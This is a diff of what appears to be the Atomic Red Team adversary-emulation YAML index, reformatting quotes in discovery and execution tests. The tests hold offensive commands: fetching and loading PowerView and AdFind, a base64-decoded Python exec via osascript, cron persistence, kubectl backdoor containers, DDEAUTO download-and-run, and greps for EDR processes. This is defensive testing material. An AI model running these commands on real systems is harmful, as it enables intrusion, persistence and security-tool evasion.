-'
+ '
- name: Wmic Group Discovery
auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2
description: 'Utilizing wmic.exe to enumerate groups on the local system. Upon
execution, information will be displayed of local groups on system.
-'
+ '
supported_platforms:
- windows
executor:
command: 'wmic.exe group get name
-'
+ '
name: powershell
- name: WMIObject Group Discovery
auto_generated_guid: 69119e58-96db-4110-ad27-954e48f3bb13
@@ -59540,13 +59540,13 @@ discovery:
groups on the endpoint. Upon execution, Upon execution, information will be
displayed of local groups on system.
-'
+ '
supported_platforms:
- windows
executor:
command: 'Get-WMIObject Win32_Group
-'
+ '
name: powershell
T1046:
technique:
@@ -59642,28 +59642,28 @@ discovery:
dependencies:
- description: 'Check if nmap command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release nmap)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)\n"
- description: 'Check if nc command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release nc)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)\n"
- description: 'Check if telnet command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v telnet)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release telnet)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n"
executor:
@@ -59691,7 +59691,7 @@ discovery:
dependencies:
- description: 'NMap must be installed
-'
+ '
prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
@@ -59704,7 +59704,7 @@ discovery:
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
description: 'Scan ports to check for listening ports with python
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -59720,17 +59720,17 @@ discovery:
dependencies:
- description: 'Check if python exists on the machine
-'
+ '
prereq_command: 'if (python --version) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
executor:
command: 'python #(unknown) -i #{host_ip}
-'
+ '
name: powershell
T1135:
technique:
@@ -59796,7 +59796,7 @@ discovery:
auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7
description: 'Network Share Discovery
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -59814,7 +59814,7 @@ discovery:
auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae
description: 'Network Share Discovery using smbstatus
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -59831,16 +59831,16 @@ discovery:
dependencies:
- description: 'Package with smbstatus (samba) must exist on device
-'
+ '
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: 'smbstatus --shares
-'
+ '
name: bash
elevation_required: true
- name: Network Share Discovery command prompt
@@ -59858,7 +59858,7 @@ discovery:
executor:
command: 'net view \\#{computer_name}
-'
+ '
name: command_prompt
- name: Network Share Discovery PowerShell
auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
@@ -59870,7 +59870,7 @@ discovery:
executor:
command: 'get-smbshare
-'
+ '
name: powershell
- name: View available share drives
auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
@@ -59882,28 +59882,28 @@ discovery:
executor:
command: 'net share
-'
+ '
name: command_prompt
- name: Share Discovery with PowerView
auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd
description: 'Enumerate Domain Shares the current user has access. Upon execution,
progress info about each share being scanned will be displayed.
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Endpoint must be joined to domain
-'
+ '
prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: '"Join system to domain"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59928,7 +59928,7 @@ discovery:
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1"
-OutFile $env:TEMP\PowerView.ps1
-'
+ '
executor:
command: |
Import-Module $env:TEMP\PowerView.ps1
@@ -60005,11 +60005,11 @@ discovery:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -60035,11 +60035,11 @@ discovery:
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
-'
+ '
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install epel-release tcpdump tshark)||(which
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n"
executor:
@@ -60082,14 +60082,14 @@ discovery:
- description: 'tshark must be installed and in the default path of "c:\Program
Files\Wireshark\Tshark.exe".
-'
+ '
prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: 'npcap must be installed.
-'
+ '
prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
@@ -60097,7 +60097,7 @@ discovery:
executor:
command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-'
+ '
name: command_prompt
elevation_required: true
- name: Windows Internal Packet Capture
@@ -60180,57 +60180,57 @@ discovery:
auto_generated_guid: '085fe567-ac84-47c7-ac4c-2688ce28265b'
description: 'Lists the password complexity policy to console on Ubuntu Linux.
-'
+ '
supported_platforms:
- linux
executor:
command: 'cat /etc/pam.d/common-password
-'
+ '
name: bash
- name: Examine password complexity policy - CentOS/RHEL 7.x
auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
description: 'Lists the password complexity policy to console on CentOS/RHEL
7.x Linux.
-'
+ '
supported_platforms:
- linux
dependencies:
- description: 'System must be CentOS or RHEL v7
-'
+ '
prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "7" ]; then
exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from CentOS or RHEL v7
-'
+ '
executor:
command: 'cat /etc/security/pwquality.conf
-'
+ '
name: bash
- name: Examine password complexity policy - CentOS/RHEL 6.x
auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358
description: 'Lists the password complexity policy to console on CentOS/RHEL
6.x Linux.
-'
+ '
supported_platforms:
- linux
dependencies:
- description: 'System must be CentOS or RHEL v6
-'
+ '
prereq_command: 'if [ $(rpm -q --queryformat ''%{VERSION}'') -eq "6" ]; then
exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from CentOS or RHEL v6
-'
+ '
executor:
command: |
cat /etc/pam.d/system-auth
@@ -60240,43 +60240,43 @@ discovery:
auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
-'
+ '
supported_platforms:
- linux
executor:
command: 'cat /etc/login.defs
-'
+ '
name: bash
- name: Examine local password policy - Windows
auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6
description: 'Lists the local password policy to console on Windows.
-'
+ '
supported_platforms:
- windows
executor:
command: 'net accounts
-'
+ '
name: command_prompt
- name: Examine domain password policy - Windows
auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4
description: 'Lists the domain password policy to console on Windows.
-'
+ '
supported_platforms:
- windows
executor:
command: 'net accounts /domain
-'
+ '
name: command_prompt
- name: Examine password policy - macOS
auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742
description: 'Lists the password policy to console on macOS.
-'
+ '
supported_platforms:
- macos
executor:
@@ -60288,7 +60288,7 @@ discovery:
domain policy or the domain controller policy for the current domain or a
specified domain/domain controller.
-'
+ '
supported_platforms:
- windows
executor:
@@ -60489,7 +60489,7 @@ discovery:
ps aux >> #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
name: sh
- name: Process Discovery - tasklist
auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908
@@ -60501,7 +60501,7 @@ discovery:
executor:
command: 'tasklist
-'
+ '
name: command_prompt
- name: Process Discovery - Get-Process
auto_generated_guid: 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
@@ -60513,7 +60513,7 @@ discovery:
executor:
command: 'Get-Process
-'
+ '
name: powershell
- name: Process Discovery - get-wmiObject
auto_generated_guid: b51239b4-0129-474f-a2b4-70f855b9f2c2
@@ -60525,7 +60525,7 @@ discovery:
executor:
command: 'get-wmiObject -class Win32_Process
-'
+ '
name: powershell
- name: Process Discovery - wmic process
auto_generated_guid: 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
@@ -60537,7 +60537,7 @@ discovery:
executor:
command: 'wmic process get /format:list
-'
+ '
name: command_prompt
T1012:
technique:
@@ -60703,7 +60703,7 @@ discovery:
executor:
command: 'net group "Domain Computers" /domain
-'
+ '
name: command_prompt
- name: Remote System Discovery - nltest
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
@@ -60721,7 +60721,7 @@ discovery:
executor:
command: 'nltest.exe /dclist:#{target_domain}
-'
+ '
name: command_prompt
- name: Remote System Discovery - ping sweep
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
@@ -60734,7 +60734,7 @@ discovery:
executor:
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
-'
+ '
name: command_prompt
- name: Remote System Discovery - arp
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
@@ -60745,7 +60745,7 @@ discovery:
executor:
command: 'arp -a
-'
+ '
name: command_prompt
- name: Remote System Discovery - arp nix
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
@@ -60760,17 +60760,17 @@ discovery:
dependencies:
- description: 'Check if arp command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get
&& apt-get install -y net-tools)\n"
executor:
command: 'arp -a | grep -v ''^?''
-'
+ '
name: sh
- name: Remote System Discovery - sweep
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
@@ -60798,7 +60798,7 @@ discovery:
command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip;
[ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
-'
+ '
name: sh
- name: Remote System Discovery - nslookup
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
@@ -60843,35 +60843,35 @@ discovery:
dependencies:
- description: 'Computer must have python 3 installed
-'
+ '
prereq_command: 'if (python --version) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "Python 3 must be installed manually"
-'
+ '
- description: 'Computer must have pip installed
-'
+ '
prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'echo "PIP must be installed manually"
-'
+ '
- description: 'adidnsdump must be installed and part of PATH
-'
+ '
prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'pip3 install adidnsdump
-'
+ '
executor:
command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
-'
+ '
name: command_prompt
elevation_required: true
- name: Adfind - Enumerate Active Directory Computer Objects
@@ -60890,14 +60890,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=computer)\n"
name: command_prompt
@@ -60917,14 +60917,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -sc dclist\n"
name: command_prompt
@@ -60938,17 +60938,17 @@ discovery:
dependencies:
- description: 'Check if ip command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'apt-get install iproute2 -y
-'
+ '
executor:
command: 'ip neighbour show
-'
+ '
name: sh
- name: Remote System Discovery - ip route
auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
@@ -60960,17 +60960,17 @@ discovery:
dependencies:
- description: 'Check if ip command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'apt-get install iproute2 -y
-'
+ '
executor:
command: 'ip route show
-'
+ '
name: sh
- name: Remote System Discovery - ip tcp_metrics
auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388
@@ -60982,17 +60982,17 @@ discovery:
dependencies:
- description: 'Check if ip command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: 'apt-get install iproute2 -y
-'
+ '
executor:
command: 'ip tcp_metrics show |grep --invert-match "^127\."
-'
+ '
name: sh
- name: Enumerate domain computers within Active Directory using DirectorySearcher
auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
@@ -61035,7 +61035,7 @@ discovery:
elevation_required: false
command: 'Get-AdComputer -Filter *
-'
+ '
- name: Enumerate Active Directory Computers with ADSISearcher
auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
description: |
@@ -61049,14 +61049,14 @@ discovery:
elevation_required: false
command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
-'
+ '
- name: Get-DomainController with PowerView
auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
description: 'Utilizing PowerView, run Get-DomainController to identify the
Domain Controller. Upon execution, information about the domain controller
within the domain will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -61176,7 +61176,7 @@ discovery:
executor:
command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu''
-'
+ '
name: sh
- name: Security Software Discovery - ps (Linux)
auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2
@@ -61188,7 +61188,7 @@ discovery:
executor:
command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
-'
+ '
name: sh
- name: Security Software Discovery - Sysmon Service
auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9
@@ -61201,7 +61201,7 @@ discovery:
executor:
command: 'fltmc.exe | findstr.exe 385201
-'
+ '
name: command_prompt
elevation_required: true
- name: Security Software Discovery - AV Discovery via WMI
@@ -61278,7 +61278,7 @@ discovery:
command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
/v svcVersion
-'
+ '
name: command_prompt
- name: Applications Installed
auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
@@ -61298,7 +61298,7 @@ discovery:
software that is installed on the system. Adversaries may use the information
from Software Discovery during automated discovery to shape follow-on behaviors
-'
+ '
supported_platforms:
- macos
executor:
@@ -61411,7 +61411,7 @@ discovery:
| grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization
Environment detected"; fi;
-'
+ '
- name: Detect Virtualization Environment (Windows)
auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d
description: 'Windows Management Instrumentation(WMI) objects contains system
@@ -61421,7 +61421,7 @@ discovery:
This is meant to find the result of Not supported, which is the result if
run in a virtual machine
-'
+ '
supported_platforms:
- windows
executor:
@@ -61438,7 +61438,7 @@ discovery:
the system. If it''s a virtual machine, one of the device manufacturer will
be a Virtualization Software.
-'
+ '
supported_platforms:
- macos
executor:
@@ -61448,7 +61448,7 @@ discovery:
''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment
detected''; fi;
-'
+ '
- name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78
description: "Windows Management Instrumentation(WMI) objects contain system
@@ -61540,7 +61540,7 @@ discovery:
description: 'Identify System Info. Upon execution, system info and time info
will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -61552,7 +61552,7 @@ discovery:
auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6
description: 'Identify System Info
-'
+ '
supported_platforms:
- macos
executor:
@@ -61564,7 +61564,7 @@ discovery:
auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c
description: 'Identify System Info
-'
+ '
supported_platforms:
- linux
- macos
@@ -61581,14 +61581,14 @@ discovery:
#{output_file} 2>/dev/null\n"
cleanup_command: 'rm #{output_file} 2>/dev/null
-'
+ '
name: sh
- name: Linux VM Check via Hardware
auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec
description: 'Identify virtual machine hardware. This technique is used by the
Pupy RAT and other malware.
-'
+ '
supported_platforms:
- linux
executor:
@@ -61607,7 +61607,7 @@ discovery:
description: 'Identify virtual machine guest kernel modules. This technique
is used by the Pupy RAT and other malware.
-'
+ '
supported_platforms:
- linux
executor:
@@ -61623,40 +61623,40 @@ discovery:
description: 'Identify system hostname for Windows. Upon execution, the hostname
of the device will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'hostname
-'
+ '
name: command_prompt
- name: Hostname Discovery
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
description: 'Identify system hostname for Linux and macOS systems.
-'
+ '
supported_platforms:
- linux
- macos
executor:
command: 'hostname
-'
+ '
name: bash
- name: Windows MachineGUID Discovery
auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8
description: 'Identify the Windows MachineGUID value for a system. Upon execution,
the machine GUID will be displayed from registry.
-'
+ '
supported_platforms:
- windows
executor:
command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
MachineGuid
-'
+ '
name: command_prompt
- name: Griffon Recon
auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
@@ -61681,27 +61681,27 @@ discovery:
description: 'Identify all environment variables. Upon execution, environments
variables and your path info will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'set
-'
+ '
name: command_prompt
- name: Environment variables discovery on macos and linux
auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720
description: 'Identify all environment variables. Upon execution, environments
variables and your path info will be displayed.
-'
+ '
supported_platforms:
- macos
- linux
executor:
command: 'env
-'
+ '
name: sh
- name: Show System Integrity Protection status (MacOS)
auto_generated_guid: 327cc050-9e99-4c8e-99b5-1d15f2fb6b96
@@ -61709,13 +61709,13 @@ discovery:
is commonly used by malware and post-exploitation tools to determine whether
certain files and directories on the system are writable or not.
-'
+ '
supported_platforms:
- macos
executor:
command: 'csrutil status
-'
+ '
name: sh
T1614.001:
technique:
@@ -61944,7 +61944,7 @@ discovery:
executor:
command: 'netsh advfirewall firewall show rule name=all
-'
+ '
name: command_prompt
- name: System Network Configuration Discovery
auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -61959,11 +61959,11 @@ discovery:
dependencies:
- description: 'Check if arp command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get
&& DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n"
executor:
@@ -62015,10 +62015,10 @@ discovery:
dependencies:
- description: 'Test requires #{port_file} to exist
-'
+ '
prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
@@ -62037,7 +62037,7 @@ discovery:
| Out-File -Encoding ASCII -append $file\nWrite-Host $results\n"
cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}"
-'
+ '
name: powershell
- name: Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
@@ -62055,14 +62055,14 @@ discovery:
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (#{adfind_path})
-'
+ '
prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-OutFile #{adfind_path}
-'
+ '
executor:
command: "#{adfind_path} -f (objectcategory=subnet)\n"
name: command_prompt
@@ -62191,7 +62191,7 @@ discovery:
executor:
command: 'Get-NetTCPConnection
-'
+ '
name: powershell
- name: System Network Connections Discovery Linux & MacOS
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -62206,14 +62206,14 @@ discovery:
dependencies:
- description: 'Check if netstat command exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Install netstat on the machine."; exit 1;
-'
+ '
executor:
command: |
netstat
@@ -62247,10 +62247,10 @@ discovery:
dependencies:
- description: 'Sharpview.exe must exist on disk at specified location (#{SharpView})
-'
+ '
prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null
Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
@@ -62364,7 +62364,7 @@ discovery:
\n$env:UserName | Out-File -FilePath .\\CurrentactiveUser.txt -Append\n"
cleanup_command: 'Remove-Item -Path .\CurrentactiveUser.txt -Force
-'
+ '
name: powershell
- name: GetCurrent User with PowerShell Script
auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
@@ -62377,7 +62377,7 @@ discovery:
-FilePath .\\CurrentUserObject.txt\n"
cleanup_command: 'Remove-Item -Path .\CurrentUserObject.txt -Force
-'
+ '
name: powershell
T1007:
technique:
@@ -62456,10 +62456,10 @@ discovery:
executor:
command: 'net.exe start >> #{output_file}
-'
+ '
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
-'
+ '
name: command_prompt
T1124:
technique:
@@ -62526,7 +62526,7 @@ discovery:
description: 'Identify the system time. Upon execution, the local computer system
time and timezone will be displayed.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -62544,13 +62544,13 @@ discovery:
description: 'Identify the system time via PowerShell. Upon execution, the system
time will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
command: 'Get-Date
-'
+ '
name: powershell
- name: System Time Discovery in macOS
auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f
@@ -62561,7 +62561,7 @@ discovery:
executor:
command: 'date
-'
+ '
name: sh
T1497.003:
technique:
@@ -66420,7 +66420,7 @@ execution:
command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\"
| python &\""
-'
+ '
name: sh
T1053.001:
technique:
@@ -66491,7 +66491,7 @@ execution:
description: 'This test submits a command to be run in the future by the `at`
daemon.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -66507,30 +66507,30 @@ execution:
dependencies:
- description: 'The `at` and `atd` executables must exist in the PATH
-'
+ '
prereq_command: 'which at && which atd
-'
+ '
get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
in the PATH (Package name: `at`)''
-'
+ '
- description: 'The `atd` daemon must be running
-'
+ '
prereq_command: 'systemctl status atd || service atd status
-'
+ '
get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
atd start` ; systemd: `systemctl start atd`)''
-'
+ '
executor:
name: sh
elevation_required: false
command: 'echo "#{at_command}" | at #{time_spec}
-'
+ '
T1053.002:
technique:
object_marking_refs:
@@ -66627,7 +66627,7 @@ execution:
elevation_required: false
command: 'at 13:20 /interactive cmd
-'
+ '
T1059:
technique:
object_marking_refs:
@@ -66937,7 +66937,7 @@ execution:
a backdoor container, and run their malicious code remotely by using “kubectl
exec”.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -66952,20 +66952,20 @@ execution:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: |
kubectl create -f src/busybox.yaml -n #{namespace}
kubectl exec -n #{namespace} busybox -- #{command}
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1053.007:
@@ -67035,7 +67035,7 @@ execution:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -67046,17 +67046,17 @@ execution:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get cronjobs -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: CreateCronjob
@@ -67068,7 +67068,7 @@ execution:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -67079,20 +67079,20 @@ execution:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
-'
+ '
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1053.003:
@@ -67159,7 +67159,7 @@ execution:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
-'
+ '
supported_platforms:
- macos
- linux
@@ -67179,7 +67179,7 @@ execution:
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
-'
+ '
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -67187,7 +67187,7 @@ execution:
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
-'
+ '
supported_platforms:
- macos
- linux
@@ -67219,7 +67219,7 @@ execution:
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -67236,10 +67236,10 @@ execution:
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
T1610:
technique:
object_marking_refs:
@@ -67391,7 +67391,7 @@ execution:
auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
description: 'Executes commands via DDE using Microsfot Word
-'
+ '
supported_platforms:
- windows
executor:
@@ -67414,13 +67414,13 @@ execution:
ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
and execute a powershell script
-'
+ '
supported_platforms:
- windows
executor:
command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
-'
+ '
name: command_prompt
- name: DDEAUTO
auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
@@ -67752,7 +67752,7 @@ execution:
auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2
description: 'Utilize launchctl
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -67767,10 +67767,10 @@ execution:
executor:
command: 'launchctl submit -l #{label_name} -- #{executable_path}
-'
+ '
cleanup_command: 'launchctl remove #{label_name}
-'
+ '
name: bash
T1053.004:
technique:
@@ -67927,7 +67927,7 @@ execution:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
-'
+ '
type: String
default: C:\Users\Public\art.jse
ms_product:
@@ -67938,7 +67938,7 @@ execution:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -67949,7 +67949,7 @@ execution:
